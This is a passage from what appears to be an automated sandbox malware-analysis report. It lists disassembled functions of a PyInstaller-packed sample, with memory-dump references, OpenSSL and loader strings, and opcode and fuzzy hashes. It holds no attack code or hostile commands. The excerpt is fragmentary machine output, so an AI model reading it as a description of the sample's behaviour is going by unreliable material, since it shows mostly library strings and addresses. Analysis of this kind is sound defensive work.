                                                                                                                                                                                                                                    • 00007FFDB2245630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFD93EC4D03,?,?,?,?,?,?,?,?,00007FFD93EC2D3B), ref: 00007FFD93EC41EF
                                                                                                                                                                                                                                    • 00007FFDB2245630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFD93EC4D03,?,?,?,?,?,?,?,?,00007FFD93EC2D3B), ref: 00007FFD93EC4241
                                                                                                                                                                                                                                    • 00007FFDB2245630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFD93EC4D03,?,?,?,?,?,?,?,?,00007FFD93EC2D3B), ref: 00007FFD93EC4254
                                                                                                                                                                                                                                    • 00007FFDB2245630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFD93EC4D03,?,?,?,?,?,?,?,?,00007FFD93EC2D3B), ref: 00007FFD93EC426B
                                                                                                                                                                                                                                    • 00007FFDB2245630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFD93EC4D03,?,?,?,?,?,?,?,?,00007FFD93EC2D3B), ref: 00007FFD93EC427E
                                                                                                                                                                                                                                    • 00007FFDB2245630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFD93EC4D03,?,?,?,?,?,?,?,?,00007FFD93EC2D3B), ref: 00007FFD93EC4295
                                                                                                                                                                                                                                    • 00007FFDB2245630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFD93EC4D03,?,?,?,?,?,?,?,?,00007FFD93EC2D3B), ref: 00007FFD93EC42A8
                                                                                                                                                                                                                                    • 00007FFDB2245630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFD93EC4D03,?,?,?,?,?,?,?,?,00007FFD93EC2D3B), ref: 00007FFD93EC42BF
                                                                                                                                                                                                                                    • 00007FFDB2245630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFD93EC4D03,?,?,?,?,?,?,?,?,00007FFD93EC2D3B), ref: 00007FFD93EC42D2
                                                                                                                                                                                                                                    • 00007FFDB2245630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFD93EC4D03,?,?,?,?,?,?,?,?,00007FFD93EC2D3B), ref: 00007FFD93EC42E5
                                                                                                                                                                                                                                    • 00007FFDB2245630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFD93EC4D03,?,?,?,?,?,?,?,?,00007FFD93EC2D3B), ref: 00007FFD93EC42F8
                                                                                                                                                                                                                                    • 00007FFDB2245630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFD93EC4D03,?,?,?,?,?,?,?,?,00007FFD93EC2D3B), ref: 00007FFD93EC430B
                                                                                                                                                                                                                                    • 00007FFDB2245630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFD93EC4D03,?,?,?,?,?,?,?,?,00007FFD93EC2D3B), ref: 00007FFD93EC4357
                                                                                                                                                                                                                                    • 00007FFDB2245630.API-MS-WIN-CRT-STRING-L1-1-0(00000000,00007FFD93EC4D03,?,?,?,?,?,?,?,?,00007FFD93EC2D3B), ref: 00007FFD93EC4382
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2450811470.00007FFD93DAD000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFD93D10000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450428384.00007FFD93D10000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93D11000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93D1D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93D75000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93D89000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93D9A000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93DA0000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93F5D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93F5F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93F8A000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93FBB000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93FE1000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD9402F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD94035000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD94037000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD94053000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD94060000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2453865099.00007FFD94064000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2453916688.00007FFD94066000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ffd93d10000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: 00007B2245630
                                                                                                                                                                                                                                    • String ID: ANY PRIVATE KEY$CERTIFICATE$CERTIFICATE REQUEST$CMS$DH PARAMETERS$ENCRYPTED PRIVATE KEY$NEW CERTIFICATE REQUEST$PARAMETERS$PKCS #7 SIGNED DATA$PKCS7$PRIVATE KEY$TRUSTED CERTIFICATE$X509 CERTIFICATE$X9.42 DH PARAMETERS
                                                                                                                                                                                                                                    • API String ID: 1780217008-1119032718
                                                                                                                                                                                                                                    • Opcode ID: 88557610c1077b526ed49270ffd766f7b77ef80781f962a522a209ea931fc564
                                                                                                                                                                                                                                    • Instruction ID: 84bf68cfdd90841e864e5e75d9498327eb08c40937dd48233af928cc20357861
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 88557610c1077b526ed49270ffd766f7b77ef80781f962a522a209ea931fc564
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9691B011F0CB4342FA766BEE95302BE16E89F95BD4F846330DD5EA62C6EE2DF4058600
                                                                                                                                                                                                                                    Function 00007FFD93D11C1C Relevance: 24.8, APIs: 5, Strings: 9, Instructions: 267COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2450811470.00007FFD93D11000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFD93D10000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450428384.00007FFD93D10000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93D1D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93D75000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93D89000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93D9A000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93DA0000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93DAD000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93F5D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93F5F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93F8A000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93FBB000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93FE1000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD9402F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD94035000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD94037000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD94053000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD94060000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2453865099.00007FFD94064000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2453916688.00007FFD94066000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ffd93d10000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: 00007B2245630
                                                                                                                                                                                                                                    • String ID: ..\s\crypto\asn1\asn_mime.c$application/pkcs7-mime$application/pkcs7-signature$application/x-pkcs7-mime$application/x-pkcs7-signature$boundary$content-type$multipart/signed$type:
                                                                                                                                                                                                                                    • API String ID: 1780217008-3630080479
                                                                                                                                                                                                                                    • Opcode ID: 7ebc3a45523df780ecbf5d5eee50afa3b023d1eb5b1fbd1f84c6fabd0e5d4c90
                                                                                                                                                                                                                                    • Instruction ID: 3cfa4e62ad55845f221c3e48ba6d872022255a3273065454abcacd0a7860857b
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7ebc3a45523df780ecbf5d5eee50afa3b023d1eb5b1fbd1f84c6fabd0e5d4c90
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4BC1CF61B1C64682FB34EBD9A4706F9A399AF45784F806131ED4D27786EF3CE619C700
                                                                                                                                                                                                                                    Function 00007FF7B2B681D0 Relevance: 24.6, APIs: 6, Strings: 8, Instructions: 117COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                      • Part of subcall function 00007FF7B2B69390: MultiByteToWideChar.KERNEL32(?,?,?,00007FF7B2B645F4,00000000,00007FF7B2B61985), ref: 00007FF7B2B693C9
                                                                                                                                                                                                                                    • ExpandEnvironmentStringsW.KERNEL32(?,00007FF7B2B686B7,?,?,00000000,00007FF7B2B63CBB), ref: 00007FF7B2B6822C
                                                                                                                                                                                                                                      • Part of subcall function 00007FF7B2B62810: MessageBoxW.USER32 ref: 00007FF7B2B628EA
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447654985.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447731342.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2BA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447830524.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: ByteCharEnvironmentExpandMessageMultiStringsWide
                                                                                                                                                                                                                                    • String ID: %.*s$CreateDirectory$LOADER: failed to convert runtime-tmpdir to a wide string.$LOADER: failed to create runtime-tmpdir path %ls!$LOADER: failed to expand environment variables in the runtime-tmpdir.$LOADER: failed to obtain the absolute path of the runtime-tmpdir.$LOADER: runtime-tmpdir points to non-existent drive %ls (type: %d)!$\
                                                                                                                                                                                                                                    • API String ID: 1662231829-930877121
                                                                                                                                                                                                                                    • Opcode ID: fc31ff70689957fcbbcceff3b4a561af51e377b196a20d8bd2d996002a1c97ad
                                                                                                                                                                                                                                    • Instruction ID: 4818b52453b51d62472c0378ddbe64f7ebf60f7328583c4c5c13f56a5c09139a
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fc31ff70689957fcbbcceff3b4a561af51e377b196a20d8bd2d996002a1c97ad
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 7151A411A1A64340FA53BB2C98556BBE260EF66740FC44436E74EC66DDFEACE404C364
                                                                                                                                                                                                                                    Function 00007FF7B2B61600 Relevance: 22.9, APIs: 1, Strings: 12, Instructions: 145COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447654985.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447731342.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2BA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447830524.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: CurrentProcess
                                                                                                                                                                                                                                    • String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
                                                                                                                                                                                                                                    • API String ID: 2050909247-1550345328
                                                                                                                                                                                                                                    • Opcode ID: 4989f99061603ba94eab136385989178fb962cde86d500dbb043ccbdbc1f54cc
                                                                                                                                                                                                                                    • Instruction ID: 801cc7101296fededb8cf7b9658180df8f68eae9e06a7eda00eb612a8e25d809
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4989f99061603ba94eab136385989178fb962cde86d500dbb043ccbdbc1f54cc
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 41518F61A1A64281EA17BB2994001A7F360AF62794FC44535EF0C877AEFEBCE555C324
                                                                                                                                                                                                                                    Function 00007FFD93D14E3F Relevance: 21.2, APIs: 8, Strings: 4, Instructions: 205registryfileCOMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2450811470.00007FFD93D11000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFD93D10000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450428384.00007FFD93D10000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93D1D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93D75000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93D89000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93D9A000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93DA0000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93DAD000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93F5D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93F5F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93F8A000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93FBB000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93FE1000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD9402F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD94035000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD94037000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD94053000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD94060000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2453865099.00007FFD94064000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2453916688.00007FFD94066000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ffd93d10000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: Event$FileSource$ByteCharDeregisterHandleMultiRegisterReportTypeWideWrite
                                                                                                                                                                                                                                    • String ID: $OpenSSL$OpenSSL: FATAL$no stack?
                                                                                                                                                                                                                                    • API String ID: 1270133462-2963566556
                                                                                                                                                                                                                                    • Opcode ID: f345fe9751aee154af01c3e1e6d1fa697fd8000db767964d7236d7de487c6ed0
                                                                                                                                                                                                                                    • Instruction ID: 41e74ca81a3dbbcb33d6f80be2b205785103a877fc7d526c977606296d024392
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f345fe9751aee154af01c3e1e6d1fa697fd8000db767964d7236d7de487c6ed0
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 3C91F332B08B8282EB308FE5D8602B97764FB89B94F444735EA5D27A95EF3DD655C300
                                                                                                                                                                                                                                    Function 00007FFD93D132AB Relevance: 19.4, APIs: 5, Strings: 6, Instructions: 127COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2450811470.00007FFD93D11000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFD93D10000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450428384.00007FFD93D10000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93D1D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93D75000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93D89000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93D9A000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93DA0000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93DAD000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93F5D000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93F5F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93F8A000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93FBB000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD93FE1000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD9402F000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD94035000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD94037000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD94053000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2450811470.00007FFD94060000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2453865099.00007FFD94064000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2453916688.00007FFD94066000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ffd93d10000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: 00007$B2231370$B2245630
                                                                                                                                                                                                                                    • String ID: ..\s\crypto\ts\ts_conf.c$accuracy$microsecs$millisecs$p$secs
                                                                                                                                                                                                                                    • API String ID: 1612326279-1596076588
                                                                                                                                                                                                                                    • Opcode ID: ae98376ed62e7f2547e13ed3231a9dc688f41d63b3bfb75b3373190d81aa6424
                                                                                                                                                                                                                                    • Instruction ID: 878572005fab1d7c42ae53905181c2101aa2a53320df68b43ad8b2917a07a4b3
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: ae98376ed62e7f2547e13ed3231a9dc688f41d63b3bfb75b3373190d81aa6424
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: EE51DF21B0964796EE38AFEAA8305B973A8FF44B84F405631ED1E27791EF3CE5458340
                                                                                                                                                                                                                                    Function 00007FF7B2B62180 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 120COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447654985.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447731342.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2BA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447830524.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: MoveWindow$ObjectSelect$DrawReleaseText
                                                                                                                                                                                                                                    • String ID: P%
                                                                                                                                                                                                                                    • API String ID: 2147705588-2959514604
                                                                                                                                                                                                                                    • Opcode ID: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                                                                                                                                                                    • Instruction ID: 7a6ca021610276367d7aa8ee5b7aa4638acc1f899663f11cac4944fd6f4c4c0c
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 044398bc2faddcfc72e28419b1c607044beef288ba0900b5e0371f537bcab75f
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 935138226047A186D6349F36E4181BBF7A1F7A8B61F044125EFCE83699EF7CD085CB20
                                                                                                                                                                                                                                    Function 00007FF7B2B680C0 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 67COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2447695186.00007FF7B2B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B2B60000, based on PE: true
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447654985.00007FF7B2B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447731342.00007FF7B2B8B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2B9E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447768150.00007FF7B2BA1000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    • Associated: 00000002.00000002.2447830524.00007FF7B2BA4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                    • Snapshot File: hcaresult_2_2_7ff7b2b60000_SecuriteInfo.jbxd
                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                    • API ID: LongWindow$BlockCreateErrorLastReasonShutdown
                                                                                                                                                                                                                                    • String ID: Needs to remove its temporary files.
                                                                                                                                                                                                                                    • API String ID: 3975851968-2863640275
                                                                                                                                                                                                                                    • Opcode ID: fca9629812ae98fc4dea80e51924cd1fa5b6a95a0379263e815d251d6ca0a567
                                                                                                                                                                                                                                    • Instruction ID: 00597c50c38c2ccc21b2ebea879ae522ea4e1956abc57469e141b1a2ae1aa794
                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: fca9629812ae98fc4dea80e51924cd1fa5b6a95a0379263e815d251d6ca0a567
                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 6C21DD21B0AA4281E7476B7DA858176E250FF6AB90F984134DB1DC73EDFE6CD584C324
                                                                                                                                                                                                                                    Function 00007FFD93BF2740 Relevance: 16.7, APIs: 11, Instructions: 230COMMON
                                                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                    • Source File: 00000002.00000002.2448990282.00007FFD93BF1000.00000040.00000001.01000000.00000017.sdmp, Offset: 00007FFD93BF0000, based on PE: true
